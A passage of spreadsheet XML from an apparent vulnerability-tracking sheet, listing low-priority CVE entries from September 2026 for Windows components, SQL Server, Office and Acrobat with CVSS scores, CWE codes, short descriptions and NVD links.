s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1283" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1283" s="5" t="inlineStr" /><c r="R1283" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="S1283" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in Windows Error Reporting allows an authorized attacker to disclose information locally.</t></is></c><c r="T1283" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69684</t></is></c></row><row r="1284"><c r="A1284" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1284" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1284" s="5" t="inlineStr"><is><t>CVE-2026-69741</t></is></c><c r="D1284" s="5" t="n"><v>5.5</v></c><c r="E1284" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1284" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1284" s="5" t="inlineStr" /><c r="H1284" s="5" t="n"><v>0.004</v></c><c r="I1284" s="5" t="inlineStr" /><c r="J1284" s="5" t="inlineStr" /><c r="K1284" s="5" t="inlineStr" /><c r="L1284" s="5" t="inlineStr" /><c r="M1284" s="5" t="inlineStr" /><c r="N1284" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1284" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1284" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1284" s="5" t="inlineStr" /><c r="R1284" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1284" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t></is></c><c r="T1284" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69741</t></is></c></row><row r="1285"><c r="A1285" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1285" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1285" s="5" t="inlineStr"><is><t>CVE-2026-69770</t></is></c><c r="D1285" s="5" t="n"><v>5.5</v></c><c r="E1285" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1285" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1285" s="5" t="inlineStr" /><c r="H1285" s="5" t="n"><v>0.004</v></c><c r="I1285" s="5" t="inlineStr" /><c r="J1285" s="5" t="inlineStr" /><c r="K1285" s="5" t="inlineStr" /><c r="L1285" s="5" t="inlineStr" /><c r="M1285" s="5" t="inlineStr" /><c r="N1285" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1285" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1285" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1285" s="5" t="inlineStr" /><c r="R1285" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1285" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t></is></c><c r="T1285" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69770</t></is></c></row><row r="1286"><c r="A1286" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1286" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1286" s="5" t="inlineStr"><is><t>CVE-2026-69794</t></is></c><c r="D1286" s="5" t="n"><v>5.5</v></c><c r="E1286" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1286" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1286" s="5" t="inlineStr" /><c r="H1286" s="5" t="n"><v>0.004</v></c><c r="I1286" s="5" t="inlineStr" /><c r="J1286" s="5" t="inlineStr" /><c r="K1286" s="5" t="inlineStr" /><c r="L1286" s="5" t="inlineStr" /><c r="M1286" s="5" t="inlineStr" /><c r="N1286" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1286" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1286" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1286" s="5" t="inlineStr" /><c r="R1286" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1286" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Encrypting File System (EFS) allows an authorized attacker to disclose information locally.</t></is></c><c r="T1286" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69794</t></is></c></row><row r="1287"><c r="A1287" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1287" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1287" s="5" t="inlineStr"><is><t>CVE-2026-69808</t></is></c><c r="D1287" s="5" t="n"><v>5.5</v></c><c r="E1287" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1287" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1287" s="5" t="inlineStr" /><c r="H1287" s="5" t="n"><v>0.004</v></c><c r="I1287" s="5" t="inlineStr" /><c r="J1287" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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7" s="5" t="inlineStr" /><c r="M1287" s="5" t="inlineStr" /><c r="N1287" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1287" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1287" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1287" s="5" t="inlineStr" /><c r="R1287" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1287" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.</t></is></c><c r="T1287" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69808</t></is></c></row><row r="1288"><c r="A1288" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1288" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1288" s="5" t="inlineStr"><is><t>CVE-2026-69862</t></is></c><c r="D1288" s="5" t="n"><v>5.5</v></c><c r="E1288" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1288" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1288" s="5" t="inlineStr" /><c r="H1288" s="5" t="n"><v>0.005</v></c><c r="I1288" s="5" t="inlineStr" /><c r="J1288" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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88" s="5" t="inlineStr" /><c r="M1288" s="5" t="inlineStr" /><c r="N1288" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1288" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1288" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1288" s="5" t="inlineStr" /><c r="R1288" s="5" t="inlineStr"><is><t>CWE-125, CWE-200</t></is></c><c r="S1288" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Wireless Wide Area Network Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1288" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69862</t></is></c></row><row r="1289"><c r="A1289" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1289" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1289" s="5" t="inlineStr"><is><t>CVE-2026-70145</t></is></c><c r="D1289" s="5" t="n"><v>5.5</v></c><c r="E1289" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1289" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1289" s="5" t="inlineStr" /><c r="H1289" s="5" t="n"><v>0.004</v></c><c r="I1289" s="5" t="inlineStr" /><c r="J1289" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K128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9" s="5" t="inlineStr" /><c r="M1289" s="5" t="inlineStr" /><c r="N1289" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1289" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1289" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1289" s="5" t="inlineStr" /><c r="R1289" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1289" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Windows Search Component allows an authorized attacker to disclose information locally.</t></is></c><c r="T1289" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70145</t></is></c></row><row r="1290"><c r="A1290" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1290" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1290" s="5" t="inlineStr"><is><t>CVE-2026-70290</t></is></c><c r="D1290" s="5" t="n"><v>5.5</v></c><c r="E1290" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1290" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1290" s="5" t="inlineStr" /><c r="H1290" s="5" t="n"><v>0.004</v></c><c r="I1290" s="5" t="inlineStr" /><c r="J1290" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K129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0" s="5" t="inlineStr" /><c r="M1290" s="5" t="inlineStr" /><c r="N1290" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1290" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1290" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1290" s="5" t="inlineStr" /><c r="R1290" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1290" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Win32 Kernel Subsystem allows an authorized attacker to disclose information locally.</t></is></c><c r="T1290" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70290</t></is></c></row><row r="1291"><c r="A1291" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1291" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1291" s="5" t="inlineStr"><is><t>CVE-2026-71341</t></is></c><c r="D1291" s="5" t="n"><v>5.5</v></c><c r="E1291" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1291" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1291" s="5" t="inlineStr" /><c r="H1291" s="5" t="n"><v>0.004</v></c><c r="I1291" s="5" t="inlineStr" /><c r="J1291" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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1" s="5" t="inlineStr" /><c r="M1291" s="5" t="inlineStr" /><c r="N1291" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1291" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1291" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1291" s="5" t="inlineStr" /><c r="R1291" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1291" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Partition Management Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1291" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71341</t></is></c></row><row r="1292"><c r="A1292" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1292" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1292" s="5" t="inlineStr"><is><t>CVE-2026-72937</t></is></c><c r="D1292" s="5" t="n"><v>5.5</v></c><c r="E1292" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1292" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1292" s="5" t="inlineStr" /><c r="H1292" s="5" t="n"><v>0.004</v></c><c r="I1292" s="5" t="inlineStr" /><c r="J1292" s="5" t="inlineStr" /><c r="K1292" s="5" t="inlineStr" /><c r="L1292" s="5" t="inlineStr" /><c r="M1292" s="5" t="inlineStr" /><c r="N1292" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1292" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1292" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1292" s="5" t="inlineStr" /><c r="R1292" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1292" s="5" t="inlineStr"><is><t>Out-of-bounds read in Storage Port Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1292" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72937</t></is></c></row><row r="1293"><c r="A1293" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1293" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1293" s="5" t="inlineStr"><is><t>CVE-2026-72945</t></is></c><c r="D1293" s="5" t="n"><v>5.5</v></c><c r="E1293" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1293" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1293" s="5" t="inlineStr" /><c r="H1293" s="5" t="n"><v>0.004</v></c><c r="I1293" s="5" t="inlineStr" /><c r="J1293" s="5" t="inlineStr" /><c r="K1293" s="5" t="inlineStr" /><c r="L1293" s="5" t="inlineStr" /><c r="M1293" s="5" t="inlineStr" /><c r="N1293" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1293" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1293" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1293" s="5" t="inlineStr" /><c r="R1293" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1293" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Task Scheduler allows an authorized attacker to disclose information locally.</t></is></c><c r="T1293" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72945</t></is></c></row><row r="1294"><c r="A1294" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1294" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1294" s="5" t="inlineStr"><is><t>CVE-2026-72964</t></is></c><c r="D1294" s="5" t="n"><v>5.5</v></c><c r="E1294" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1294" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1294" s="5" t="inlineStr" /><c r="H1294" s="5" t="n"><v>0.003</v></c><c r="I1294" s="5" t="inlineStr" /><c r="J1294" s="5" t="inlineStr" /><c r="K1294" s="5" t="inlineStr" /><c r="L1294" s="5" t="inlineStr" /><c r="M1294" s="5" t="inlineStr" /><c r="N1294" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1294" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1294" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1294" s="5" t="inlineStr" /><c r="R1294" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1294" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Internet Connection Sharing (ICS) allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1294" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72964</t></is></c></row><row r="1295"><c r="A1295" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1295" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1295" s="5" t="inlineStr"><is><t>CVE-2026-72966</t></is></c><c r="D1295" s="5" t="n"><v>5.5</v></c><c r="E1295" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1295" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1295" s="5" t="inlineStr" /><c r="H1295" s="5" t="n"><v>0.003</v></c><c r="I1295" s="5" t="inlineStr" /><c r="J1295" s="5" t="inlineStr" /><c r="K1295" s="5" t="inlineStr" /><c r="L1295" s="5" t="inlineStr" /><c r="M1295" s="5" t="inlineStr" /><c r="N1295" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1295" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1295" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1295" s="5" t="inlineStr" /><c r="R1295" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1295" s="5" t="inlineStr"><is><t>Missing authorization in Windows Remote Access Connection Manager allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1295" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72966</t></is></c></row><row r="1296"><c r="A1296" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1296" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1296" s="5" t="inlineStr"><is><t>CVE-2026-73004</t></is></c><c r="D1296" s="5" t="n"><v>5.5</v></c><c r="E1296" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1296" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1296" s="5" t="inlineStr" /><c r="H1296" s="5" t="n"><v>0.002</v></c><c r="I1296" s="5" t="inlineStr" /><c r="J1296" s="5" t="inlineStr" /><c r="K1296" s="5" t="inlineStr" /><c r="L1296" s="5" t="inlineStr" /><c r="M1296" s="5" t="inlineStr" /><c r="N1296" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1296" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1296" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1296" s="5" t="inlineStr" /><c r="R1296" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1296" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Autopilot allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1296" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73004</t></is></c></row><row r="1297"><c r="A1297" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1297" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1297" s="5" t="inlineStr"><is><t>CVE-2026-73008</t></is></c><c r="D1297" s="5" t="n"><v>5.5</v></c><c r="E1297" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1297" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1297" s="5" t="inlineStr" /><c r="H1297" s="5" t="n"><v>0.005</v></c><c r="I1297" s="5" t="inlineStr" /><c r="J1297" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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97" s="5" t="inlineStr" /><c r="M1297" s="5" t="inlineStr" /><c r="N1297" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1297" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1297" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1297" s="5" t="inlineStr" /><c r="R1297" s="5" t="inlineStr"><is><t>CWE-359</t></is></c><c r="S1297" s="5" t="inlineStr"><is><t>Exposure of private personal information to an unauthorized actor in Windows Biometric Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1297" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73008</t></is></c></row><row r="1298"><c r="A1298" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1298" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1298" s="5" t="inlineStr"><is><t>CVE-2026-77488</t></is></c><c r="D1298" s="5" t="n"><v>5.5</v></c><c r="E1298" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1298" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1298" s="5" t="inlineStr" /><c r="H1298" s="5" t="n"><v>0.003</v></c><c r="I1298" s="5" t="inlineStr" /><c r="J1298" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1298" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1298" s="5" t="inlineStr" /><c r="M1298" s="5" t="inlineStr" /><c r="N1298" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1298" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1298" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1298" s="5" t="inlineStr" /><c r="R1298" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S1298" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in SQL Server allows an authorized attacker to disclose information locally.</t></is></c><c r="T1298" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77488</t></is></c></row><row r="1299"><c r="A1299" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1299" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1299" s="5" t="inlineStr"><is><t>CVE-2026-77491</t></is></c><c r="D1299" s="5" t="n"><v>5.5</v></c><c r="E1299" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1299" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1299" s="5" t="inlineStr" /><c r="H1299" s="5" t="n"><v>0.004</v></c><c r="I1299" s="5" t="inlineStr" /><c r="J1299" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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9" s="5" t="inlineStr" /><c r="M1299" s="5" t="inlineStr" /><c r="N1299" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1299" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1299" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1299" s="5" t="inlineStr" /><c r="R1299" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1299" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows GDI allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1299" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77491</t></is></c></row><row r="1300"><c r="A1300" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1300" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1300" s="5" t="inlineStr"><is><t>CVE-2026-77492</t></is></c><c r="D1300" s="5" t="n"><v>5.5</v></c><c r="E1300" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1300" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1300" s="5" t="inlineStr" /><c r="H1300" s="5" t="n"><v>0.003</v></c><c r="I1300" s="5" t="inlineStr" /><c r="J1300" s="5" t="inlineStr" /><c r="K1300" s="5" t="inlineStr" /><c r="L1300" s="5" t="inlineStr" /><c r="M1300" s="5" t="inlineStr" /><c r="N1300" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1300" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1300" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1300" s="5" t="inlineStr" /><c r="R1300" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1300" s="5" t="inlineStr"><is><t>Out-of-bounds read in Storage Port Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1300" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77492</t></is></c></row><row r="1301"><c r="A1301" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1301" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1301" s="5" t="inlineStr"><is><t>CVE-2026-78454</t></is></c><c r="D1301" s="5" t="n"><v>5.5</v></c><c r="E1301" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1301" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1301" s="5" t="inlineStr" /><c r="H1301" s="5" t="n"><v>0.004</v></c><c r="I1301" s="5" t="inlineStr" /><c r="J1301" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K13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301" s="5" t="inlineStr" /><c r="M1301" s="5" t="inlineStr" /><c r="N1301" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1301" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1301" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1301" s="5" t="inlineStr" /><c r="R1301" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1301" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1301" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78454</t></is></c></row><row r="1302"><c r="A1302" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1302" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1302" s="5" t="inlineStr"><is><t>CVE-2026-78506</t></is></c><c r="D1302" s="5" t="n"><v>5.5</v></c><c r="E1302" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1302" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1302" s="5" t="inlineStr" /><c r="H1302" s="5" t="n"><v>0.005</v></c><c r="I1302" s="5" t="inlineStr" /><c r="J1302" s="5" t="inlineStr" /><c r="K1302" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1302" s="5" t="inlineStr" /><c r="M1302" s="5" t="inlineStr" /><c r="N1302" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1302" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1302" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1302" s="5" t="inlineStr" /><c r="R1302" s="5" t="inlineStr"><is><t>CWE-170</t></is></c><c r="S1302" s="5" t="inlineStr"><is><t>Improper null termination in Microsoft Office Word allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1302" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78506</t></is></c></row><row r="1303"><c r="A1303" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1303" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1303" s="5" t="inlineStr"><is><t>CVE-2026-78513</t></is></c><c r="D1303" s="5" t="n"><v>5.5</v></c><c r="E1303" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1303" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1303" s="5" t="inlineStr" /><c r="H1303" s="5" t="n"><v>0.005</v></c><c r="I1303" s="5" t="inlineStr" /><c r="J1303" s="5" t="inlineStr" /><c r="K1303" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L1303" s="5" t="inlineStr" /><c r="M1303" s="5" t="inlineStr" /><c r="N1303" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1303" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1303" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1303" s="5" t="inlineStr" /><c r="R1303" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1303" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1303" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78513</t></is></c></row><row r="1304"><c r="A1304" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1304" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1304" s="5" t="inlineStr"><is><t>CVE-2026-79910</t></is></c><c r="D1304" s="5" t="n"><v>5.5</v></c><c r="E1304" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1304" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1304" s="5" t="inlineStr" /><c r="H1304" s="5" t="n"><v>0.002</v></c><c r="I1304" s="5" t="inlineStr" /><c r="J1304" s="5" t="inlineStr" /><c r="K1304" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1304" s="5" t="inlineStr" /><c r="M1304" s="5" t="inlineStr" /><c r="N1304" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1304" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1304" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1304" s="5" t="inlineStr" /><c r="R1304" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1304"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04" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79910</t></is></c></row><row r="1305"><c r="A1305" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1305" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1305" s="5" t="inlineStr"><is><t>CVE-2026-80160</t></is></c><c r="D1305" s="5" t="n"><v>5.5</v></c><c r="E1305" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1305" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1305" s="5" t="inlineStr" /><c r="H1305" s="5" t="n"><v>0.002</v></c><c r="I1305" s="5" t="inlineStr" /><c r="J1305" s="5" t="inlineStr" /><c r="K1305" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1305" s="5" 